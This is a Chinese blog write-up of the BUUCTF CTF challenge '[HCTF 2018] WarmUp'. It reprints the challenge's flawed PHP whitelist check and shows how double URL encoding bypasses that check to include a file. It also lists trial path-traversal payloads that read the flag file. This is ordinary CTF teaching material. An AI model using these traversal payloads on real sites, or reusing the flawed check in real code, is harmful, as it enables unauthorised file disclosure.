Web buuctf [HCTF 2018]WarmUp1

根据题目提示是php代码审计

1.启动靶机

2.查看源代码f12

代码有文件包含

3.http://38f872fd-deb7-42aa-b8f9-34449a4a6227.node4.buuoj.cn/source.php

<?php
highlight_file(__FILE__);  //高亮
class emmm
{
    public static function checkFile(&$page)
    {
        $whitelist = ["source"=>"source.php","hint"=>"hint.php"];  //白名单设置
        if (! isset($page) || !is_string($page)) {                 //传参是否有值
            echo "you can't see it";
            return false;
        }

        if (in_array($page, $whitelist)) {                        //参数是否在白名单内
            return true;
        }
        
        $_page = mb_substr(                                       //检查参数?前的值是否在白名单内
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }

        $_page = urldecode($page);                             //url二次进行解码  ,注意添加参数
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }
        echo "you can't see it";
        return false;
    }
}

if (! empty($_REQUEST['file'])
    && is_string($_REQUEST['file'])
    && emmm::checkFile($_REQUEST['file'])
) {
    include $_REQUEST['file'];
    exit;
} else {
    echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>

根据上面的代码可以构造payload:路径/source.php?file=source.php%253fffffllllaaaagggg的参数

(ffffllllaaaagggg提示在hint.php中)

4.payload打不开证明文件不在该层上,一次尝试

/source.php?file=source.php%253../fffffllllaaaagggg

/source.php?file=source.php%253../../fffffllllaaaagggg

...

...

/source.php?file=source.php%253f../../../../../fffffllllaaaagggg

 

题目比较基础,我从csdn论坛上找几篇这个题的解释,基本就可以能够对这题的操作进行解释

链接:https://blog.csdn.net/weixin_45679095/article/details/105939012?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522162763152416780357253071%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=162763152416780357253071&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~baidu_landing_v2~default-1-105939012.pc_search_all_es&utm_term=%5BHCTF+2018%5DWarmUp+1&spm=1018.2226.3001.4187

https://blog.csdn.net/qq_42404383/article/details/103688509?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522162763152416780357253071%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=162763152416780357253071&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~baidu_landing_v2~default-3-103688509.pc_search_all_es&utm_term=%5BHCTF+2018%5DWarmUp+1&spm=1018.2226.3001.4187

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值